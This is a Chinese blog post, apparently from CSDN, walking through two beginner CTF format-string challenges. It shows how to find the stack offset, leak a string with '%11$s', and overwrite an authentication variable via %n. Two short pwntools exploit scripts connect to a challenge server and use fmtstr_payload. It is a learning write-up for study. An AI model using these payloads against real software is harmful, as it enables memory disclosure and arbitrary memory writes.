格式化字符串漏洞入门 fmtstr1,fmtstr2

最新推荐文章于 2024-04-10 14:00:00 发布
最新推荐文章于 2024-04-10 14:00:00 发布
阅读量304 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gftydc/article/details/130780230
版权

fmtstr1:

要先确定char *s相对于参数指针的偏移:

先从头打印,

fgets将输入的字符串写入format中,可以输入AAAA,然后看他在哪里出现,由此判断format相对于参数指针的偏移:(这里我是一个一个位置试的,因为只能读取19个字节,一次只能打印三个位置,但这个方法有点笨拙……)

可以看出,format的偏移量是14!

P.S. 这里使用到了%$14p,是指打印偏移为14的地方的内容。如果使用%6$s,就可以打印偏移为6处的指针指向的字符串。

又因为format和char *s距离为12,所以相差的偏移为3,因此s的偏移为11

成功!:

成功!!!:

exp1:

from pwn import *


r = remote('8.134.59.72',38877)

payload = b'AAAA%11$s'

r.sendline(payload)

r.interactive()

fmtstr2:

main -> read_flag -> flag(flag里直接就能打印flag):

所以只要把authentication这个变量的值设置成这个就行:0x47424845

authentication的地址:0x0804C048

(正好刚刚看到了一篇类似这种改写内存的博客:(13条消息) pwn 格式化字符串漏洞及例题_%格式化字符串的习题_L1men2的博客-CSDN博客

很像,使用%n,将输出的字符数量输入到目标偏移位置的内容指向的位置。就是先输入地址(哎这里还要先确定输入字符串所在的偏移位置),再输入占位字符,再输入%n

偏移量为11!(这个就比较方便因为可以读取的字符比较长,不像前面那题真讨厌)

P.S. 写入地址的时候要注意,要先从最小的(比如这里是0x42)开始写,因为输出字符个数越来越大,所以只能越写越大,而且要注意是小端存储,输入顺序是反的

……然后发现没用,怎么写都是错的……:

错的exp:

问了下同学,他说格式化字符串的payload不要自己写,有现成的函数,就是:

fmtstr_payload(offset, {addr:value})。用这个写出来再打印看看payload是啥:

这儿:

说实话看不太懂这个payload…… (但%hhn是写一个字节)

但是成功了! 就不纠结了,就用这个函数就行了

最后的exp2:

from pwn import *


r = remote('8.134.59.72',38630)

addr_au = 0x0804C048

value = 0x47424845

off = 11



payload = fmtstr_payload(off,{addr_au:value})

print(payload)


r.sendline(payload)

r.interactive()

gftydc
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fmtstr1
m0_49959202的博客
09-18 244
文章目录fmtstr11.程序分析2.exp编写 fmtstr1 1.程序分析 file一下: checksec一下: ida分析一下,发现存在printf(&buf),这里有格式化字符串漏洞,可以进行利用 发现如果x是4的话,就能够获取到shell,但是在数据段内x的值为3: 因此,需要利用格式化字符串利用,将x的值从3修改为4。 使用gdb进行调试,在printf处设置断点。 输入"%d%d", 当进入printf(&buf)时,查看栈内变量,发现"%d%d"是格式化字符串的第1
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6567
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
格式化字符串漏洞
qq_52126646的博客
03-04 3418
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
ouc 网络安全实验 格式化字符串漏洞
最新发布
m0_59598029的博客
04-10 605
这个实验很难,前前后后三周左右才啃下来这个硬骨头,期间和同学以及助教讨论学习了很多,通过这门课确实学到了不少有用的东西,只要认真做实验,对漏洞这方面的理解会很深的。
CTF中的其他漏洞1
08-03
1. **格式化字符串漏洞**: 格式化字符串漏洞通常出现在使用`printf`、`fprintf`、`sprintf`等函数时,由于对输入的格式字符串处理不当,攻击者可以控制输出内容,甚至改变程序内存中的数据。例如,`fmtstr="%%$22p...
TableFormat:TableFormat 可以在 Go 中将字符串转换为表格样式
06-28
表格格式介绍TableFormat 是 Go 编程语言中的类型格式化工具,可以将任何类型转换为 UTF-8 字符的表格样式。用法通过go get github.com/fanzhidongyzby/TableFormat安装导入包github.com/fanzhidongyzby/table 使用...
hw03报告1
08-04
7. **fmtstr_payload**:这是一个Python库`pwntools`中的函数,用于构造格式化字符串漏洞的payload,可以用来修改内存中的特定地址。 8. **Payload构造**:攻击者通过计算偏移量和使用`fmtstr_payload`函数,将`...
[pwn基础]Pwntools学习.doc
07-10
`adb` 可用于 Android 设备管理,`asm` 提供汇编和反汇编功能,`context` 设置运行环境,`dynelf` 用于远程解析函数,`encoders` 对 shellcode 进行编码,`elf` 处理 ELF 文件,`fmtstr` 用于格式化字符串漏洞利用,...
Delphi用法一 收藏
06-23
// 按指定格式格式化字符串 FormatDateTime('YYYY-MM-DD,hh-mm-ss', DATE); // 按指定格式格式化日期时间 ``` #### 字符串操作 Delphi 还提供了一些常用的字符串操作函数: - **插入字符串**: ```delphi ...
【pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5845
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
手搓payload+非栈上格式化字符串
2301_79880074的博客
02-22 1137
格式化字符串漏洞类型题中我们可以利用payload = fmtstr_payload(offset,{printf_got:system_plt})这个工具去修改地址,但是这个工具产生的字节数是很大的,有时候我们是无法去正常利用的,我们需要去自己构造payload修改地址。
pwn-格式化字符串的刷题记录(未完待续)
m0_75234353的博客
05-11 630
发现canary和RELRO部分开。
格式化输出:fmt库用法
xiao_12312的博客
01-06 1005
cpp中如果有#include 则无需额外添加,否则添加#include 。
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4873
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
[pwn] 7.格式化字符串
H4ppyD0g的博客
09-01 572
a
Linux pwn入门教程——格式化字符串漏洞
dfdhxb995397的博客
07-18 385
本文作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42943-1-1.html 0×00 printf函数中的漏洞printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 然而,有时候为了省事也会写成 事实上,这是一种非常...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3838
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
go语言如何格式化字符串
06-06
在 Go 语言中,您可以使用 `fmt.Sprintf()` 函数来格式化字符串。这个函数的用法和 C 语言中的 `printf()` 函数非常类似,不同之处是 `fmt.Sprintf()` 函数并不直接将结果输出到屏幕上,而是将结果作为字符串返回。 下面是一个简单的示例: ```go package main import "fmt" func main() { name := "Alice" age := 23 fmtStr := "My name is %s and I am %d years old." result := fmt.Sprintf(fmtStr, name, age) fmt.Println(result) } ``` 在这个示例中,我们定义了一个格式化字符串 `My name is %s and I am %d years old.`,其中 `%s` 和 `%d` 分别代表字符串和数字类型的占位符。我们使用 `fmt.Sprintf()` 函数将 `name` 和 `age` 变量的值填充到占位符中,最终将格式化后的字符串作为结果打印到屏幕上。 除了上面这种基本的格式化方式外,`fmt.Sprintf()` 函数还支持更多高级的格式化选项,比如控制字符串宽度、精度、填充字符等。如果您需要了解更多关于字符串格式化的知识,可以参考 Go 语言的官方文档:https://golang.org/pkg/fmt/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值